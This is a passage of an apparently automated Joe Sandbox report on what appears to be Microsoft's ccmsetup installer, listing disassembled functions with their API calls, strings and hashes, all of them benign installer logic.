                                                                                            • Part of subcall function 005F0DBA: TlsSetValue.KERNEL32(00000000,?,?,?,?,00000004,00571045), ref: 005F0DE1
                                                                                            • Part of subcall function 005F0DBA: lstrlenW.KERNEL32(00000000,?,?,?,?,00000004,00571045), ref: 005F0DF1
                                                                                            • Part of subcall function 005F0DBA: TlsSetValue.KERNEL32(00000000,?,?,?,?,00000004,00571045), ref: 005F0E04
                                                                                            • Part of subcall function 005F0DBA: TlsSetValue.KERNEL32(00000000,?,?,?,?,00000004,00571045), ref: 005F0E3D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: Value$H_prolog3H_prolog3_catch_lstrlen
                                                                                          • String ID: CcmUtilLib::IsSSLCapabilityPresent$Property[@Name="AuthMethod"] $Property[@Name="SSL"] $Property[@Name="SSLState"] $Value$Value
                                                                                          • API String ID: 3729917967-1985152115
                                                                                          • Opcode ID: 4333610dbe77b5a0d7a5521060e5a95efee9240e21c26ab61d8bc5958c1fa0fb
                                                                                          • Instruction ID: 0ed7147ed9a404192e2298eae1b0890bcbc5a54c91043a2387e454d588f80620
                                                                                          • Opcode Fuzzy Hash: 4333610dbe77b5a0d7a5521060e5a95efee9240e21c26ab61d8bc5958c1fa0fb
                                                                                          • Instruction Fuzzy Hash: 92718C70C0928CEADF15DBE8C995BDDBFB5AF11304F28809DE441A7282DBB44B49DB61
                                                                                          Function 006770AF Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 148COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_GS.LIBCMT ref: 006770B6
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                            • Part of subcall function 005F6FE7: __EH_prolog3_catch.LIBCMT ref: 005F6FEE
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                            • Part of subcall function 005F4099: __EH_prolog3.LIBCMT ref: 005F40A0
                                                                                          Strings
                                                                                          • By default filtering out IF_TYPE_TUNNEL, xrefs: 00677284
                                                                                          • IPv6IFTypeFilterList, xrefs: 00677105
                                                                                          • Loaded IPv6IFTypeFilterList '%s', xrefs: 00677156
                                                                                          • Software\Microsoft\CCM, xrefs: 006770EA
                                                                                          • No IPv6 addresses will be filtered based on IF Type., xrefs: 00677240
                                                                                          • IF type '%u' will be filtered., xrefs: 006771BC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3$H_prolog3_catch$CloseCurrentH_prolog3_Thread
                                                                                          • String ID: By default filtering out IF_TYPE_TUNNEL$IF type '%u' will be filtered.$IPv6IFTypeFilterList$Loaded IPv6IFTypeFilterList '%s'$No IPv6 addresses will be filtered based on IF Type.$Software\Microsoft\CCM
                                                                                          • API String ID: 4177011481-3127954991
                                                                                          • Opcode ID: 3401be671ccea6c6f3ffff3c71c0e9da2fd348c2168b90882fbfe1703f9984c5
                                                                                          • Instruction ID: 3b736987f4e1634bd76d9213f700bd82421ee200bf00ea8681e6fb8859536adb
                                                                                          • Opcode Fuzzy Hash: 3401be671ccea6c6f3ffff3c71c0e9da2fd348c2168b90882fbfe1703f9984c5
                                                                                          • Instruction Fuzzy Hash: 0A515BB1C0435DAADF10EBD0C889AEDBBB9FF55304F144019E525BB282DBB85A49CF61
                                                                                          Function 006083E6 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 117threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 006083ED
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006084FE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3H_prolog3_catch_Thread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\path.cpp$..\path.cpp$CCM::Utility::Filesystem::Path::Normalize$pszPath && pszPath[0]
                                                                                          • API String ID: 2239685220-4123174800
                                                                                          • Opcode ID: 695522d273aea198d6ff64260ac71a9dc9847efb7c9b03dbb7cf058a5e4809d9
                                                                                          • Instruction ID: ecaf5bf79261367d8d7b54b2e8de2bc280ad9c133f027619319613189f90559a
                                                                                          • Opcode Fuzzy Hash: 695522d273aea198d6ff64260ac71a9dc9847efb7c9b03dbb7cf058a5e4809d9
                                                                                          • Instruction Fuzzy Hash: A9410BB1C4420AEECF14EBA8DC85AEE7BB5AF55320F248219F561772D2DE745E05C710
                                                                                          Function 00598181 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 112COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00598188
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 0063D4FE: __EH_prolog3_catch_GS.LIBCMT ref: 0063D505
                                                                                            • Part of subcall function 0063D4FE: GetCurrentThreadId.KERNEL32 ref: 0063D59B
                                                                                            • Part of subcall function 005B619E: __EH_prolog3_catch.LIBCMT ref: 005B61A5
                                                                                            • Part of subcall function 005B619E: GetCurrentThreadId.KERNEL32 ref: 005B6230
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          • Ccmsetup is called for upgrade/repair but failed to get local site code with error 0x%x. Will use specified or discovered site cod, xrefs: 0059828E
                                                                                          • SMSSITECODE, xrefs: 0059825B
                                                                                          • 0&l, xrefs: 005981F7
                                                                                          • Ccmsetup is called for upgrade/repair. Using the currently assigned site code '%s', xrefs: 0059823D
                                                                                          • Ccmsetup is called for upgrade/repair but client is not currently present. Will use specified or discovered site code., xrefs: 005982CF
                                                                                          • CcmSetup::PreserveSiteCode, xrefs: 005981A0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_$H_prolog3H_prolog3_catch
                                                                                          • String ID: 0&l$CcmSetup::PreserveSiteCode$Ccmsetup is called for upgrade/repair but client is not currently present. Will use specified or discovered site code.$Ccmsetup is called for upgrade/repair but failed to get local site code with error 0x%x. Will use specified or discovered site cod$Ccmsetup is called for upgrade/repair. Using the currently assigned site code '%s'$SMSSITECODE
                                                                                          • API String ID: 3423034556-1158740678
                                                                                          • Opcode ID: cdad4eeb336503efb52b263ee58cded3843054449cd53ccc81973a814cf787b9
                                                                                          • Instruction ID: 6d878161764df244f637a2a017baf87f66eeca2fced11ecd3530b76828dd5c0d
                                                                                          • Opcode Fuzzy Hash: cdad4eeb336503efb52b263ee58cded3843054449cd53ccc81973a814cf787b9
                                                                                          • Instruction Fuzzy Hash: 54417F71D45209AADF00EBE4C94ABEEBFB6BF56300F644019F511A7282DFB45A09CB61
                                                                                          Function 005F646B Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 101threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005F6472
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F6568
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catch_Thread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\String.cpp$..\String.cpp$CCM::Utility::String::tokenize$szDelim && *szDelim
                                                                                          • API String ID: 958242921-1749164640
                                                                                          • Opcode ID: 3163b030f69f6eed2f6d63be436b7d322da66937121eeb5852e1e685500e77cf
                                                                                          • Instruction ID: 11e882fce497568bbf1d227ee1917c0f09c6b24f314dae8a1a5ff6543cefe15a
                                                                                          • Opcode Fuzzy Hash: 3163b030f69f6eed2f6d63be436b7d322da66937121eeb5852e1e685500e77cf
                                                                                          • Instruction Fuzzy Hash: 3F319C71A00259AFCF14EBB8D999ABEBFB5BF84310F148169F545E7281DA789E01CB10
                                                                                          Function 005AD1ED Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 93threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005AD1F7
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005AD2A2
                                                                                          Strings
                                                                                          • msiutil.cpp, xrefs: 005AD2AA
                                                                                          • GetPackageCodeByUpgradeCode, xrefs: 005AD228
                                                                                          • msiutil.cpp, xrefs: 005AD292
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005AD29D
                                                                                          • GetInstalledProductInfo( szProductCode, sPackageCode, sProductVersion ), xrefs: 005AD298
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3H_prolog3_catch_Thread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$GetInstalledProductInfo( szProductCode, sPackageCode, sProductVersion )$GetPackageCodeByUpgradeCode$msiutil.cpp$msiutil.cpp
                                                                                          • API String ID: 2239685220-3197176602
                                                                                          • Opcode ID: 94b726e412d7d5458b06d9793e4d73b2821e0b6ad54f757073c6665c342505dc
                                                                                          • Instruction ID: 2823518fcd5cb36bad641c260402c3c8487ce9be70b3b2e1cdea4f1545b29837
                                                                                          • Opcode Fuzzy Hash: 94b726e412d7d5458b06d9793e4d73b2821e0b6ad54f757073c6665c342505dc
                                                                                          • Instruction Fuzzy Hash: D6310871D01359AADF20FBA48D49BEEBEB9BF55304F10805AF445B7282DB744E04D7A1
                                                                                          Function 005B745F Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 78threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005B7466
                                                                                            • Part of subcall function 0059E344: __EH_prolog3_catch.LIBCMT ref: 0059E34B
                                                                                            • Part of subcall function 005B6E52: __EH_prolog3_catch_GS.LIBCMT ref: 005B6E5C
                                                                                            • Part of subcall function 005B6E52: GetCurrentThreadId.KERNEL32 ref: 005B6F10
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B74E0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catchThread$H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$GetInstalledLanguages(mapLangs)$GetOrderedInstalledLangs$util.cpp$util.cpp
                                                                                          • API String ID: 1438242263-3129631628
                                                                                          • Opcode ID: f00413b69b1de0b2e9786ca85bc412b4fbfdeffc63ebc9a33efaa8672c38eee1
                                                                                          • Instruction ID: aa36499e51c38ee22b6161071eec1e5c46c889567dffd13d953c18815f895e6b
                                                                                          • Opcode Fuzzy Hash: f00413b69b1de0b2e9786ca85bc412b4fbfdeffc63ebc9a33efaa8672c38eee1
                                                                                          • Instruction Fuzzy Hash: A321F070D8824ADBCB10EBA4C819AEEBF71BF98710F184059F445B73C2DB34AA00CB61
                                                                                          Function 005F91E3 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 72threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005F91ED
                                                                                            • Part of subcall function 005F954D: __EH_prolog3_catch_GS.LIBCMT ref: 005F9554
                                                                                            • Part of subcall function 005F954D: GetCurrentThreadId.KERNEL32 ref: 005F95F8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F9275
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catchH_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\util.cpp$..\util.cpp$CCM::Utility::CcmGetOSVersion$CcmGetOSVersionEx(osVerInfo)
                                                                                          • API String ID: 3531467662-2325366695
                                                                                          • Opcode ID: 8f3b8c33b0e4c6006b491b956e96e8c2e4803c3321267a7c85f2bbc729cb5282
                                                                                          • Instruction ID: 7e1aaf8fd0d44066d16d790b9b8752b495f43703ea50f6dd89d60b1451fa8e72
                                                                                          • Opcode Fuzzy Hash: 8f3b8c33b0e4c6006b491b956e96e8c2e4803c3321267a7c85f2bbc729cb5282
                                                                                          • Instruction Fuzzy Hash: 70219FB5A41209AFCB11DFA8C845AEE7FB4BF49700F144096F904AB381D7389E00CB61
                                                                                          Function 00591335 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 71threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00591360
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$(szValues.resize(0x2000) == true) != 0$LoadConfigFile failed with error 0x%x$`)l$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 2882836952-2682175195
                                                                                          • Opcode ID: 7d754d02a05df5e5e76273dde3416590e8e608ef8c4052a8f94152730224e6b6
                                                                                          • Instruction ID: d81bef60e845ed6db13a030737dffca89a89ca24a66fc35c24306e1ce8b7686f
                                                                                          • Opcode Fuzzy Hash: 7d754d02a05df5e5e76273dde3416590e8e608ef8c4052a8f94152730224e6b6
                                                                                          • Instruction Fuzzy Hash: 3E21B470D04299EADF21EBA4CD8ABDEBE74BB91704F1444D9F00537181DB740B85CB61
                                                                                          Function 00591334 Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 71threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00591360
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$(szValues.resize(0x2000) == true) != 0$LoadConfigFile failed with error 0x%x$`)l$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 2882836952-2682175195
                                                                                          • Opcode ID: 23d9db19ef7c641331637c0e7b674278a27b3890bea5ff13a6c1a23dcfa49fa2
                                                                                          • Instruction ID: d81bef60e845ed6db13a030737dffca89a89ca24a66fc35c24306e1ce8b7686f
                                                                                          • Opcode Fuzzy Hash: 23d9db19ef7c641331637c0e7b674278a27b3890bea5ff13a6c1a23dcfa49fa2
                                                                                          • Instruction Fuzzy Hash: 3E21B470D04299EADF21EBA4CD8ABDEBE74BB91704F1444D9F00537181DB740B85CB61
                                                                                          Function 005912BE Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 70threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005912E9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$(szSections.resize(0x1000) == true) != 0$LoadConfigFile failed with error 0x%x$`)l$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 2882836952-4071032929
                                                                                          • Opcode ID: 8e5cf61035eadce0f9c2336256738f9a23b0f8c91429ab9b2e904cb899e1d413
                                                                                          • Instruction ID: f3157934ca67d8c7f98cbff4b2f38fec096ad84d04ef946e11af6c75ee3d7ad6
                                                                                          • Opcode Fuzzy Hash: 8e5cf61035eadce0f9c2336256738f9a23b0f8c91429ab9b2e904cb899e1d413
                                                                                          • Instruction Fuzzy Hash: 7321E170804289EADF21EBA4CD8ABEEBEB5BB92704F1484D9E10537181DB740B85CB61
                                                                                          Function 0060831C Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 57threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00608323
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00608379
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
